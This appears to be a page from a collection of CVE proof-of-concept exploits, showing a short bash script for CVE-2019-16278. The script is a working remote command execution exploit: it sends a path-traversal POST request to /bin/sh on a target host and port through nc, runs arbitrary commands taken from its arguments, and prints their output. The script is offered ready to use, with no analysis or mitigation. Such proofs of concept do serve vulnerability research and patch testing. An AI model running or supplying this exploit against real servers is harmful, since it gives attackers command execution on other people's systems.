4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / CVE-2019-16278.sh SH
#!/usr/bin/env bash

HOST="$1"
PORT="$2"
shift 2

( \
    echo -n -e 'POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0\r\n'; \
    echo -n -e 'Content-Length: 1\r\n\r\necho\necho\n'; \
    echo "$@ 2>&1" \
) | nc "$HOST" "$PORT" \
  | sed --quiet --expression ':S;/^\r$/{n;bP};n;bS;:P;n;p;bP'